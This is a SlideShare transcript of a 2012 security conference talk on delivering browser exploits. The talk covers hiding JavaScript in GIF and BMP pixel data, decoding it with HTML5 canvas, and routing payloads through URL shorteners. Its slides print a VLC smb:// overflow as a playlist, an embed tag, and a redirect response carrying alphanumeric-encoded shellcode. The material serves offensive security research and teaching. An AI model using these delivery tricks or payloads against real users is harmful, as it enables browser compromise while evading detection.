SlideShare a Scribd company logo

Innovative Exploit Delivery

Saumil Shah
Saumil Shah

The document discusses innovative ways to deliver exploits, including encoding them in image file formats by using the image's alpha channel or pixel values to represent exploit code. Specific techniques demonstrated include encoding exploits in GIF and BMP images, using HTML5 canvas to decode and execute the encoded JavaScript, and shortening encoded exploit URLs with services like TinyURL. The presentation concludes by considering potential future avenues for this approach using emerging web technologies.

Technology
1 of 31
INNOVATIVE EXPLOIT DELIVERY SAUMIL SHAH net-square HITB2012KUL
# who am i Saumil Shah, CEO Net-Square. • Hacker, Speaker, Trainer, Author - 15 yrs in Infosec. • M.S. Computer Science Purdue University. • saumil@net-square.com • LinkedIn: saumilshah • Twitter: @therealsaumil net-square
My area of work Penetration Reverse Exploit Testing Engineering Writing New Offensive Attack Research Security Defense Conference "Eyes and Speaker ears open" net-square
When two forces combine... Web Binary Hacking Exploits net-square
SNEAKY LETHAL net-square
net-square
302 IMG JS HTML5 net-square
net-square
VLC smb overflow • smb://example.com@0.0.0.0/foo/#{AAAA AAAA....} • Classic Stack Overflow. net-square
VLC XSPF file <?xml version="1.0" encoding="UTF-8"?> <playlist version="1" xmlns="http://xspf.org/ns/0/" xmlns:vlc="http://www.videolan.org/vlc/playlist/ns/0/"> <title>Playlist</title> <trackList> <track> <location> smb://example.com@0.0.0.0/foo/#{AAAAAAAA....} </location> <extension application="http://www.videolan.org/vlc/playlist/0"> <vlc:id>0</vlc:id> </extension> </track> </trackList> </playlist> net-square
Alpha Encoded Tiny ZOMFG Exploit URL net-square
100% Pure Alphanum! net-square
VLC smb overflow - HTMLized!! <embed type="application/x-vlc-plugin" width="320" height="200" target="http://tinyurl.com/ycctrzf" id="vlc" /> net-square
301 Redirect from tinyurl HTTP/1.1 301 Moved Permanently X-Powered-By: PHP/5.2.12 Location: smb://example.com@0.0.0.0/foo/#{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAj4?wTYIIIIIIIIIIIIIIII7QZjAX P0A0AkAAQ2AB2BB0BBABXP8ABuJICVK1JjIoFoQRPRBJGrChJmDnElGuBzCDHoOHF4P0P0CgLKHzNO QeIzNOCEJGIoM7AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAT00WT00WWYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBAB XP8ABuJIKLIxCtGpC0GpLKQUGLNkQlFeD8GqHoLKPOEHLKCoQ0EQHkQYLKP4NkEQJNP1KpNyNLMTIP QdC7KqIZDMC1O2JKL4GKCdGTGtBUIuLKQOQ4EQHkPfLKDLBkLKCoGlEQJKLKGlLKEQHkOyClQ4GtJc EaIPBDNkG0P0MUIPCHDLLKG0FlNkPpGlNMNkE8GxHkEYLKOpH0EPC0EPLKQxGLQOEaJVQpCfOyHxOs IPCKBpCXHpLJC4QOPhJ8KNNjDNF7KOIwPcCQPlQsDnCUCHPeEPAA} Content-type: text/html Content-Length: 0 Connection: close Server: TinyURL/1.6 net-square
net-square
Exploits as Images - 1 • Grayscale encoding (0-255). • 1 pixel = 1 character. • Perfectly valid image. • Decode and Execute! net-square
net-square
I'm an evil Javascript I'm an innocent image net-square
<CANVAS> net-square
net-square c) no eval()
Same Same No Different! var a = eval(str); a = (new Function(str))(); net-square
d) IMAJS net-square
IMAJS Seeing is Believing net-square
Browser Support for IMAJS-GIF Height Width Browser/Viewer Image Javascript Renders? Executes? 2f 2a 00 00 Firefox yes yes 2f 2a 00 00 Safari yes yes 2f 2a 00 00 IE no yes 2f 2a 00 00 Chrome yes yes 2f 2a 00 00 Preview.app yes - 2f 2a 00 00 XP Image Viewer no - 2f 2a 00 00 Win 7 Preview yes - net-square
Browser Support for IMAJS-BMP Height Width Browser/Viewer Image Javascript Renders? Executes? 2f 2a 00 00 Firefox yes yes 2f 2a 00 00 Safari yes yes 2f 2a 00 00 IE yes yes 2f 2a 00 00 Chrome yes yes 2f 2a 00 00 Opera yes yes 2f 2a 00 00 Preview.app yes - 2f 2a 00 00 XP Image Viewer yes - 2f 2a 00 00 Win 7 Preview yes - net-square
e) The αq exploit net-square
Encode using Alpha channel net-square
Demo IMAJS αq FTW! net-square
f) ONE LAST DEMO!!! net-square
The FUTURE? HTML5 Video SVG WebGL Mobile Browsers net-square
KTHXBAI See you in 2013?? net-square saumil@net-square.com | @therealsaumil

Recommended

Stegosploit - Hacking With Pictures HITB2015AMS
Stegosploit - Hacking With Pictures HITB2015AMSStegosploit - Hacking With Pictures HITB2015AMS
Stegosploit - Hacking With Pictures HITB2015AMSSaumil Shah
 
Keep Calm and Stegosploit - 44CON 2015
Keep Calm and Stegosploit - 44CON 2015Keep Calm and Stegosploit - 44CON 2015
Keep Calm and Stegosploit - 44CON 2015Saumil Shah
 
Hacking with Pictures - Hack.LU 2014
Hacking with Pictures - Hack.LU 2014Hacking with Pictures - Hack.LU 2014
Hacking with Pictures - Hack.LU 2014Saumil Shah
 
Deadly pixels - NSC 2013
Deadly pixels - NSC 2013Deadly pixels - NSC 2013
Deadly pixels - NSC 2013Saumil Shah
 
2012: The End of the World?
2012: The End of the World?2012: The End of the World?
2012: The End of the World?Saumil Shah
 
Exploit Delivery
Exploit DeliveryExploit Delivery
Exploit DeliverySaumil Shah
 
12 Years and a Baker's Dozen - Lessons and Learnings from my Infosec Journey
12 Years and a Baker's Dozen - Lessons and Learnings from my Infosec Journey12 Years and a Baker's Dozen - Lessons and Learnings from my Infosec Journey
12 Years and a Baker's Dozen - Lessons and Learnings from my Infosec JourneySaumil Shah
 
2010 A Net Odyssey
2010 A Net Odyssey2010 A Net Odyssey
2010 A Net OdysseySaumil Shah
 

Recommended

Stegosploit - Hacking With Pictures HITB2015AMS
Stegosploit - Hacking With Pictures HITB2015AMSStegosploit - Hacking With Pictures HITB2015AMS
Stegosploit - Hacking With Pictures HITB2015AMSSaumil Shah
 
Keep Calm and Stegosploit - 44CON 2015
Keep Calm and Stegosploit - 44CON 2015Keep Calm and Stegosploit - 44CON 2015
Keep Calm and Stegosploit - 44CON 2015Saumil Shah
 
Hacking with Pictures - Hack.LU 2014
Hacking with Pictures - Hack.LU 2014Hacking with Pictures - Hack.LU 2014
Hacking with Pictures - Hack.LU 2014Saumil Shah
 
Deadly pixels - NSC 2013
Deadly pixels - NSC 2013Deadly pixels - NSC 2013
Deadly pixels - NSC 2013Saumil Shah
 
2012: The End of the World?
2012: The End of the World?2012: The End of the World?
2012: The End of the World?Saumil Shah
 
Exploit Delivery
Exploit DeliveryExploit Delivery
Exploit DeliverySaumil Shah
 
12 Years and a Baker's Dozen - Lessons and Learnings from my Infosec Journey
12 Years and a Baker's Dozen - Lessons and Learnings from my Infosec Journey12 Years and a Baker's Dozen - Lessons and Learnings from my Infosec Journey
12 Years and a Baker's Dozen - Lessons and Learnings from my Infosec JourneySaumil Shah
 
2010 A Net Odyssey
2010 A Net Odyssey2010 A Net Odyssey
2010 A Net OdysseySaumil Shah
 
Technical Introduction to YDN
Technical Introduction to YDNTechnical Introduction to YDN
Technical Introduction to YDNChristian Heilmann
 
Echo HTML5
Echo HTML5Echo HTML5
Echo HTML5Nathan Smith
 
HTML5 Multimedia: where we are, where we're going
HTML5 Multimedia: where we are, where we're goingHTML5 Multimedia: where we are, where we're going
HTML5 Multimedia: where we are, where we're goingbrucelawson
 
Stefan Judis "Did we(b development) lose the right direction?"
Stefan Judis "Did we(b development) lose the right direction?"Stefan Judis "Did we(b development) lose the right direction?"
Stefan Judis "Did we(b development) lose the right direction?"Fwdays
 
Multimedia on the web - HTML5 video and audio
Multimedia on the web - HTML5 video and audioMultimedia on the web - HTML5 video and audio
Multimedia on the web - HTML5 video and audioChristian Heilmann
 
Hacking With Pictures SyScan 2015
Hacking With Pictures SyScan 2015Hacking With Pictures SyScan 2015
Hacking With Pictures SyScan 2015Saumil Shah
 
Ajax to the Moon
Ajax to the MoonAjax to the Moon
Ajax to the Moondavejohnson
 
5 年後還是新手 - WordPress Plugin 開發大冒險 - GOTY
5 年後還是新手 - WordPress Plugin 開發大冒險 - GOTY5 年後還是新手 - WordPress Plugin 開發大冒險 - GOTY
5 年後還是新手 - WordPress Plugin 開發大冒險 - GOTYWilliam Chong
 
HTML5 multimedia - where we are, where we're going
HTML5 multimedia - where we are, where we're goingHTML5 multimedia - where we are, where we're going
HTML5 multimedia - where we are, where we're goingbrucelawson
 
Sailesh cv+ more
Sailesh cv+ moreSailesh cv+ more
Sailesh cv+ moreSailesh sunny
 
Pushing the web — WebSockets
Pushing the web — WebSocketsPushing the web — WebSockets
Pushing the web — WebSocketsRoland M
 
Topsy Turvy Design
Topsy Turvy DesignTopsy Turvy Design
Topsy Turvy DesignRich Quick
 
Mobile Web Talk
Mobile Web TalkMobile Web Talk
Mobile Web TalkPeter Robinett
 
夜宴42期《Gadgets》
夜宴42期《Gadgets》夜宴42期《Gadgets》
夜宴42期《Gadgets》Koubei Banquet
 
Banquet 42
Banquet 42Banquet 42
Banquet 42Koubei UED
 
Oracle ODI & Oracle SOA installation
Oracle ODI & Oracle SOA installationOracle ODI & Oracle SOA installation
Oracle ODI & Oracle SOA installationOsama Mustafa
 
A Gentle introduction to Web Development & Django
A Gentle introduction to Web Development & DjangoA Gentle introduction to Web Development & Django
A Gentle introduction to Web Development & DjangoPRASANNAVENK
 
Deep crawl the chaotic landscape of JavaScript
Deep crawl the chaotic landscape of JavaScript Deep crawl the chaotic landscape of JavaScript
Deep crawl the chaotic landscape of JavaScript Onely
 
CSS3 3D Workshop
CSS3 3D WorkshopCSS3 3D Workshop
CSS3 3D WorkshopChristopher Schmitt
 
[heweb11] CSS3 Makeover
[heweb11] CSS3 Makeover[heweb11] CSS3 Makeover
[heweb11] CSS3 MakeoverChristopher Schmitt
 
The Hand That Strikes, Also Blocks
The Hand That Strikes, Also BlocksThe Hand That Strikes, Also Blocks
The Hand That Strikes, Also BlocksSaumil Shah
 
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPSDebugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPSSaumil Shah
 

More Related Content

Similar to Innovative Exploit Delivery

HTML5 Multimedia: where we are, where we're going
HTML5 Multimedia: where we are, where we're goingHTML5 Multimedia: where we are, where we're going
HTML5 Multimedia: where we are, where we're goingbrucelawson
 
Stefan Judis "Did we(b development) lose the right direction?"
Stefan Judis "Did we(b development) lose the right direction?"Stefan Judis "Did we(b development) lose the right direction?"
Stefan Judis "Did we(b development) lose the right direction?"Fwdays
 
Multimedia on the web - HTML5 video and audio
Multimedia on the web - HTML5 video and audioMultimedia on the web - HTML5 video and audio
Multimedia on the web - HTML5 video and audioChristian Heilmann
 
Hacking With Pictures SyScan 2015
Hacking With Pictures SyScan 2015Hacking With Pictures SyScan 2015
Hacking With Pictures SyScan 2015Saumil Shah
 
Ajax to the Moon
Ajax to the MoonAjax to the Moon
Ajax to the Moondavejohnson
 
5 年後還是新手 - WordPress Plugin 開發大冒險 - GOTY
5 年後還是新手 - WordPress Plugin 開發大冒險 - GOTY5 年後還是新手 - WordPress Plugin 開發大冒險 - GOTY
5 年後還是新手 - WordPress Plugin 開發大冒險 - GOTYWilliam Chong
 
HTML5 multimedia - where we are, where we're going
HTML5 multimedia - where we are, where we're goingHTML5 multimedia - where we are, where we're going
HTML5 multimedia - where we are, where we're goingbrucelawson
 
Pushing the web — WebSockets
Pushing the web — WebSocketsPushing the web — WebSockets
Pushing the web — WebSocketsRoland M
 
Topsy Turvy Design
Topsy Turvy DesignTopsy Turvy Design
Topsy Turvy DesignRich Quick
 
夜宴42期《Gadgets》
夜宴42期《Gadgets》夜宴42期《Gadgets》
夜宴42期《Gadgets》Koubei Banquet
 
Oracle ODI & Oracle SOA installation
Oracle ODI & Oracle SOA installationOracle ODI & Oracle SOA installation
Oracle ODI & Oracle SOA installationOsama Mustafa
 
A Gentle introduction to Web Development & Django
A Gentle introduction to Web Development & DjangoA Gentle introduction to Web Development & Django
A Gentle introduction to Web Development & DjangoPRASANNAVENK
 
Deep crawl the chaotic landscape of JavaScript
Deep crawl the chaotic landscape of JavaScript Deep crawl the chaotic landscape of JavaScript
Deep crawl the chaotic landscape of JavaScript Onely
 

Similar to Innovative Exploit Delivery (20)

Technical Introduction to YDN
Technical Introduction to YDNTechnical Introduction to YDN
Technical Introduction to YDN
 
Echo HTML5
Echo HTML5Echo HTML5
Echo HTML5
 
HTML5 Multimedia: where we are, where we're going
HTML5 Multimedia: where we are, where we're goingHTML5 Multimedia: where we are, where we're going
HTML5 Multimedia: where we are, where we're going
 
Stefan Judis "Did we(b development) lose the right direction?"
Stefan Judis "Did we(b development) lose the right direction?"Stefan Judis "Did we(b development) lose the right direction?"
Stefan Judis "Did we(b development) lose the right direction?"
 
Multimedia on the web - HTML5 video and audio
Multimedia on the web - HTML5 video and audioMultimedia on the web - HTML5 video and audio
Multimedia on the web - HTML5 video and audio
 
Hacking With Pictures SyScan 2015
Hacking With Pictures SyScan 2015Hacking With Pictures SyScan 2015
Hacking With Pictures SyScan 2015
 
Ajax to the Moon
Ajax to the MoonAjax to the Moon
Ajax to the Moon
 
5 年後還是新手 - WordPress Plugin 開發大冒險 - GOTY
5 年後還是新手 - WordPress Plugin 開發大冒險 - GOTY5 年後還是新手 - WordPress Plugin 開發大冒險 - GOTY
5 年後還是新手 - WordPress Plugin 開發大冒險 - GOTY
 
HTML5 multimedia - where we are, where we're going
HTML5 multimedia - where we are, where we're goingHTML5 multimedia - where we are, where we're going
HTML5 multimedia - where we are, where we're going
 
Sailesh cv+ more
Sailesh cv+ moreSailesh cv+ more
Sailesh cv+ more
 
Pushing the web — WebSockets
Pushing the web — WebSocketsPushing the web — WebSockets
Pushing the web — WebSockets
 
Topsy Turvy Design
Topsy Turvy DesignTopsy Turvy Design
Topsy Turvy Design
 
Mobile Web Talk
Mobile Web TalkMobile Web Talk
Mobile Web Talk
 
夜宴42期《Gadgets》
夜宴42期《Gadgets》夜宴42期《Gadgets》
夜宴42期《Gadgets》
 
Banquet 42
Banquet 42Banquet 42
Banquet 42
 
Oracle ODI & Oracle SOA installation
Oracle ODI & Oracle SOA installationOracle ODI & Oracle SOA installation
Oracle ODI & Oracle SOA installation
 
A Gentle introduction to Web Development & Django
A Gentle introduction to Web Development & DjangoA Gentle introduction to Web Development & Django
A Gentle introduction to Web Development & Django
 
Deep crawl the chaotic landscape of JavaScript
Deep crawl the chaotic landscape of JavaScript Deep crawl the chaotic landscape of JavaScript
Deep crawl the chaotic landscape of JavaScript
 
CSS3 3D Workshop
CSS3 3D WorkshopCSS3 3D Workshop
CSS3 3D Workshop
 
[heweb11] CSS3 Makeover
[heweb11] CSS3 Makeover[heweb11] CSS3 Makeover
[heweb11] CSS3 Makeover
 

More from Saumil Shah

The Hand That Strikes, Also Blocks
The Hand That Strikes, Also BlocksThe Hand That Strikes, Also Blocks
The Hand That Strikes, Also BlocksSaumil Shah
 
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPSDebugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPSSaumil Shah
 
Unveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation FrameworkUnveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation FrameworkSaumil Shah
 
Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332Saumil Shah
 
Precise Presentations
Precise PresentationsPrecise Presentations
Precise PresentationsSaumil Shah
 
Effective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual AudienceEffective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual AudienceSaumil Shah
 
INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020Saumil Shah
 
Cyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade AheadCyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade AheadSaumil Shah
 
Cybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In CyberspaceCybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In CyberspaceSaumil Shah
 
NSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade AheadNSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade AheadSaumil Shah
 
Cybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade AheadCybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade AheadSaumil Shah
 
INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019Saumil Shah
 
Introducing ARM-X
Introducing ARM-XIntroducing ARM-X
Introducing ARM-XSaumil Shah
 
The Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBDThe Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBDSaumil Shah
 
The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019Saumil Shah
 
The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019Saumil Shah
 
Schrödinger's ARM Assembly
Schrödinger's ARM AssemblySchrödinger's ARM Assembly
Schrödinger's ARM AssemblySaumil Shah
 
ARM Polyglot Shellcode - HITB2019AMS
ARM Polyglot Shellcode - HITB2019AMSARM Polyglot Shellcode - HITB2019AMS
ARM Polyglot Shellcode - HITB2019AMSSaumil Shah
 
What Makes a Compelling Photograph
What Makes a Compelling PhotographWhat Makes a Compelling Photograph
What Makes a Compelling PhotographSaumil Shah
 
Make ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEKMake ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEKSaumil Shah
 

More from Saumil Shah (20)

The Hand That Strikes, Also Blocks
The Hand That Strikes, Also BlocksThe Hand That Strikes, Also Blocks
The Hand That Strikes, Also Blocks
 
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPSDebugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
 
Unveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation FrameworkUnveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation Framework
 
Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332
 
Precise Presentations
Precise PresentationsPrecise Presentations
Precise Presentations
 
Effective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual AudienceEffective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual Audience
 
INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020
 
Cyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade AheadCyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade Ahead
 
Cybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In CyberspaceCybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
 
NSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade AheadNSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade Ahead
 
Cybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade AheadCybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade Ahead
 
INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019
 
Introducing ARM-X
Introducing ARM-XIntroducing ARM-X
Introducing ARM-X
 
The Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBDThe Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBD
 
The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019
 
The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019
 
Schrödinger's ARM Assembly
Schrödinger's ARM AssemblySchrödinger's ARM Assembly
Schrödinger's ARM Assembly
 
ARM Polyglot Shellcode - HITB2019AMS
ARM Polyglot Shellcode - HITB2019AMSARM Polyglot Shellcode - HITB2019AMS
ARM Polyglot Shellcode - HITB2019AMS
 
What Makes a Compelling Photograph
What Makes a Compelling PhotographWhat Makes a Compelling Photograph
What Makes a Compelling Photograph
 
Make ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEKMake ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEK
 

Recently uploaded

GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdflior mazor
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherRemote DBA Services
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?Antenna Manufacturer Coco
 
Tech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdfTech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdfhans926745
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...apidays
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024The Digital Insurer
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century educationjfdjdjcjdnsjd
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilDeveloping An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilV3cube
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?Igalia
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 

Recently uploaded (20)

GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
Tech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdfTech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdf
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilDeveloping An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of Brazil
 
A Year of the Servo Reboot: Where Are We Now?
